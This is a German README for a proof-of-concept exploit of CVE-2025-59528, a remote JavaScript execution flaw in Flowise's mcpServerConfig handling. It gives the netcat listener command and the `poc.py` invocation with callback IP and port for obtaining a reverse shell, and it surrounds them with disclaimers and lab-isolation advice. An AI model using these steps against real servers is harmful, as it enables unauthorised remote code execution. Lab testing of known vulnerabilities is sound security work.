
Der PoC für CVE-2025-59528
Proof of Concept für die Untersuchung von CVE-2025-59528 in einer isolierten Laborumgebung.
[!WARNING] HAFTUNGSAUSSCHLUSS
Dieses Projekt dient ausschließlich Bildungszwecken, der Sicherheitsforschung und dem Testen von Systemen, die dir gehören oder für deren Test du eine ausdrückliche Genehmigung hast.
Verwende diesen PoC nicht gegen Server Dritter, öffentliche Dienste oder Infrastruktur ohne die Erlaubnis des Eigentümers.
Der Autor haftet nicht für Schäden, Datenverlust, Dienstunterbrechungen oder rechtliche Konsequenzen, die aus der missbräuchlichen Verwendung dieses Projekts resultieren.
Dieser PoC demonstriert die potenziellen Auswirkungen von CVE-2025-59528, einer Sicherheitslücke, die die Verarbeitung der benutzergesteuerten mcpServerConfig-Konfiguration in Flowise betrifft.
Unter bestimmten Bedingungen kann die Sicherheitslücke es einem Angreifer ermöglichen, beliebigen JavaScript-Code im serverseitigen Kontext auszuführen.
Überprüfe vor dem Test immer die genaue Version der Zielinstallation.
requestsInstalliere die Python-Abhängigkeit:
pip install requests
Starte netcat, um eine Shell zu erhalten:
nc -lvnp <YOUR_PORT>
Führe den PoC aus:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
| Argument | Beschreibung |
|---|---|
-t, --target | URL der Flowise-Testinstanz |
-o, --api_key | API-Schlüssel |
-i, --ip | IP-Adresse der Testmaschine |
-p, --port | Port der Testumgebung |
Tests sollten innerhalb eines isolierten virtuellen oder Labor-Netzwerks durchgeführt werden.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
Setze eine absichtlich verwundbare Flowise-Instanz nicht direkt dem öffentlichen Internet aus.
Wenn du eine betroffene Flowise-Version ausführst:
Durch die Verwendung dieses Projekts erkennst du an, dass du allein für die Einhaltung aller geltenden Gesetze und Vorschriften verantwortlich bist.
Verwende diesen PoC nur gegen Systeme, die dir gehören, oder gegen Systeme, für die du eine ausdrückliche Genehmigung zur Durchführung von Sicherheitstests hast.